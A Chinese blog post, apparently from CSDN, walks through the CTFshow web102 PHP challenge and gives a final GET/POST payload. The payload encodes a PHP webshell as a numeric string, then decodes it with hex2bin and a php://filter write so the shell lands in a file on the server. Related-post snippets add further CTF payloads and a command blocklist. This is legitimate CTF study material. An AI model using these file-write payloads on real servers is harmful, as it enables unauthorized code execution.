CTFshow web入门web102-php14

最新推荐文章于 2024-05-01 22:46:17 发布
最新推荐文章于 2024-05-01 22:46:17 发布
阅读量114 收藏
点赞数 1
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74336671/article/details/134606011
版权

初始化界面:

 分析:

is_numeric() 用于检测是否为数字或数字字符串,如果指定的变量是数字和数字字符串则返回true,否则返回false。

如果字符串中含有一个e代表科学计数法,也可返回true。 substr($v2,2) 是相当于返回v2[2:]

call_user_func() 函数用于调用方法或者变量,第一个参数是被调用的函数,第二个是调用的函数的参数 file_put_contents($v3,$str)是将$str的内容写入并保存为$v3(第一个参数是文件名,第二个参数是内容)

这里v2和v3都要是数字,substr取v2[2:],v2开头可以是00来作为开头,然后v1(v2[2:])。web100的时候说了等号优先级比and高,所以v4那里满足v2是数字即可保证v4为真

v2要保证能写shell,又要保证能为数字。

首先v2是shell,先整个 '<?=`tac *`;'然后想办法对其进行处理,直接hex的话有字母,我觉得不行。在之前对其base64之后,

3d是等号,解码的时候不是很严格

v2 = 504438395948526859794171594473

v1就要对其进行hex解码,用hex2bin(16进制转ascii字符,不是转2进制)

v3要对其进行base64解码,可以控制的协议流用base64解码写入文件

最终payload:(记得v2前面加个00):

GET:v2=00504438395948526859794171594473&v3=php://filter/write=convert.base64-decode/resource=mumuzi.php

POST:v1=hex2bin
 

郭与童
关注
ctfshow web入门 PHP特性中篇(web105-web132)
ccfly1012的博客
09-11 1394
目录 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115 web123 web125 web126 web127 web128 web129 web130 web131 web132 web105 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 1
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 1897
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
ctfshow-web入门-102
最新发布
2302_81156108的博客
05-01 1246
本菜鸡感觉自己又行了,请师傅们斧正!!!
CTFshow php特性 web102
Kradress的博客
12-14 621
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: atao # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-23 20:59:43 */ highlight_file(__FILE__); $v1 = $_POST['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3
CTFshow php特性 web103
Kradress的博客
12-14 407
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: atao # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-23 21:03:24 */ highlight_file(__FILE__); $v1 = $_POST['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3
ctfshow web102-107
akxnxbshai的博客
01-26 3241
目录 Web 102-103 web 104 Web 105 Web 106 Web 107 Web 102-103 substr() 函数返回字符串的一部分 此题中v2被去掉了前两位字符所以到时候给v2前加两个数字 call_user_func函数 php5下is_numeric可识别16进制,如0x2e,然后调用hex2bin转成字符串写入木马,但题目环境没配好,是php7,所以要另换方法。 用伪协议写入,所以需要base64编码后转成16进制全是数字的字符串 &lt
ctfshow 基础补web入门PHP特性102开始
giaogiao123的博客
06-06 706
<?php highlight_file(__FILE__); $v1 = $_POST['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; $v4 = is_numeric($v2) and is_numeric($v3); if($v4){ $s = substr($v2,2); $str = call_user_func($v1,$s); echo $str; file_put_contents($v3,$str); }
ctfshow web入门 php特性web98-102
m0_62207170的博客
06-24 792
ctfshow web入门 php特性web98-102
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167(1)
2401_84297265的博客
04-28 824
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow web入门文件包含82-86
xiaolong22333的博客
12-14 2366
知识点: 利用session.upload_progress进行文件包含 条件竞争 思路就是通过上传PHP_SESSION_UPLOAD_PROGRESS来访问/tmp/sess_xxx,从而进行文件包含 原理可以看这篇文章利用session.upload_progress进行文件包含和反序列化渗透 其中主要的几点 首先上传PHP_SESSION_UPLOAD_PROGRESS,代码如下 <!DOCTYPE html> <html> <body> <f
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 903
ctfshow,命令执行,web31
ctfshow-web入门-命令执行-web30
HkD01L的博客
06-21 281
ctfshow,命令执行,web30
ctfshow-Web入门-58~74wp
yutianovo的博客
09-24 1121
Web58-65 POST c=include($_GET['url']); GET /?url=php://filter/read=convert.base64-encode/resource=flag.php Web66-70 flag 换位置了 /flag.txt Payload还可以用 Web71 import requests url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/" d = {'c': 'i
《CTFshow-Web入门》10. Web 91~110
学习学习学习......
10-01 8095
PHP 特性之 preg_match(),换行解析漏洞、intval(),== 与 === 的区别、md5()、in_array()、三元运算、赋值运算【=】优先级、ReflectionClass($class) 建立反射类、is_numeric() 特性,call_user_func() 与 hex2bin() 利用,PHP 伪协议、sha1()、变量覆盖、parse_str() 利用、ereg() 截断漏洞、__toString() 与类触发、FilesystemIterator 类,getcwd()。
ctfshow--web入门web101--web115&web123&web125-web133)
qing_chuan_的博客
06-08 1068
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
ctfshow-web入门-php特性
qq_43618536的博客
07-11 1643
ctfshow-web入门-php特性
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 5万+
个人向CTF Web题思路总结笔记
ctfshow PHP特性(89-115)【学习记录】
ximo的博客
02-17 566
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } intval() 函数用于获取变量的整数值。 但是要绕过正
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3510
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
ctfshow web入门 php特性
03-16
PHP是一种开源的服务器端脚本语言,主要用于网站开发。它支持多种数据库和操作系统,并且可以与HTML、CSS和JavaScript等语言结合使用。常用的特性包括变量、数组、循环、条件语句、函数、类和对象等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值